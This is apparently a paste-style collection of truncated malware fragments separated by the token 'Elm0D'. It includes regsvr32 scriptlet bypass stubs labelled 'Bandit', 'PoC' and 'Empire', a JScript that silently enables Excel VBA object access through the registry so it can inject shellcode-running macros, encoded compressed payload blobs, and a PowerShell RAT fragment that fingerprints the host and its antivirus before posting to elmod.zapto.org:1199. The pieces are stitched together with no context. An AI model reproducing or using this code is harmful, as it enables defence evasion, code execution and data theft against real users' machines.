Elm0D

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;


/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='

Elm0D

var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';

Elm0D

$EncodedCompressedFile = @';;
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/jt/9f/53f28D9j36NX+vX/A1/zd/w1/g1fiv64zeTz/6CPfon/TUUsd9Tfv+1BG885uev8QfJ53/ob/hr0o/f8w9nAAzD/LQ/+HlKcL+LX35PAvkbeV/8Qvr/b0r//wN+jV8DH/9Gu7/Gr/E7eV/f+KS/xq/xG3h//gb097e9v8dt/q6ln3/ZbyFteay/ltdAPv4DxnVTT38Nxe33pP//JvT/3yZsRx//nuM6L6up4AqcGZYhsmv3JPyEyLUnP7/9a+CVX/fX+Ic+ovmgPn7NX4P//+v9Bh85nrjN8zvu/Dq/xn/9a/C7v/mv8WvU9GPV/Ga/xq+RJL9eRX8nv8av8R/8ukTZ/+DX+DW2aODJb/i7/BZ//G9LjX+j3+C3qR9S07/kN/htt35L+vwv+Q1+O/3529ff589/B/37d6z/Uf77d9K/f+f6d/818fcv0L9/lx8zvyT1lL/5XX7DX78i4ia/8W/xa2/91vLVb2Ta/Mb1L5E2v8mvX/028tFvar77zeo/W777zX/9inBMqt+OP9/67elH/ffTV7/N7/J7bv0O9Mcv/BbG+5th9L/mr/Hb/La/xq9Lg/41v/Vrbf0CHu+v8a1f47fc+bV+jce/Bk/Jb/5r/FL69tf5rf6vX/O3+b9o1Nsf/Rr1f0ig/iUSwV9r63dBLyn90/yuTLE/CE3lhd/wk1/j1//Wb7nza/4aJBWQV4

Elm0D

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>

Elm0D

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>

Elm0D

$spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';if (test-path $e) {$nt = 'YES'} else {$nt= 'NO'}; if (test-path 'HKCU:\vdw0rm') {$usb = 'TRUE'} else { $usb = 'FALSE'};$u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;return $u} catch {Start-Sleep -s 3}};function post ($cmdv, $v) { try { $enc = [system.Text.Encoding]::UTF8;$Req = [System.Net.HttpWebRequest]::Create('http://elmod.zapto.org:1199/' + $cmdv);$Req.Method = 'POST';$req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req

Elm0D

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		<![CDATA[
	

Elm0D

$EncodedCompressedFile = @'
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/jt/9f/53f28D9j36NX+vX/A1/zd/w1/g1fiv64zeTz/6CPfon/TUUsd9Tfv+1BG885uev8QfJ53/ob/hr0o/f8w9nAAzD/LQ/+HlKcL+LX35PAvkbeV/8Qvr/b0r//wN+jV8DH/9Gu7/Gr/E7eV/f+KS/xq/xG3h//gb097e9v8dt/q6ln3/ZbyFteay/ltdAPv4DxnVTT38Nxe33pP//JvT/3yZsRx//nuM6L6up4AqcGZYhsmv3JPyEyLUnP7/9a+CVX/fX+Ic+ovmgPn7NX4P//+v9Bh85nrjN8zvu/Dq/xn/9a/C7v/mv8WvU9GPV/Ga/xq+RJL9eRX8nv8av8R/8ukTZ/+DX+DW2aODJb/i7/BZ//G9LjX+j3+C3qR9S07/kN/htt35L+vwv+Q1+O/3529ff589/B/37d6z/Uf77d9K/f+f6d/818fcv0L9/lx8zvyT1lL/5XX7DX78i4ia/8W/xa2/91vLVb2Ta/Mb1L5E2v8mvX/028tFvar77zeo/W777zX/9inBMqt+OP9/67elH/ffTV7/N7/J7bv0O9Mcv/BbG+5th9L/mr/Hb/La/xq9Lg/41v/Vrbf0CHu+v8a1f47fc+bV+jce/Bk/Jb/5r/FL69tf5rf6vX/O3+b9o1Nsf/Rr1f0ig/iUSwV9r63dBLyn90/yuTLE/CE3lhd/wk1/j1//Wb7nza/4aJBWQV4ID

Elm0D

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Empire"
    progid="Empire"
    version="1.00"
    classid="{00001111-0000-0000-0000-0000FEEDACDC}"
	>
	<!-- regsvr32 /s /i"C:\Bypass\STC_MsgBox.sct" scrobj.dll -->

Elm0D

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>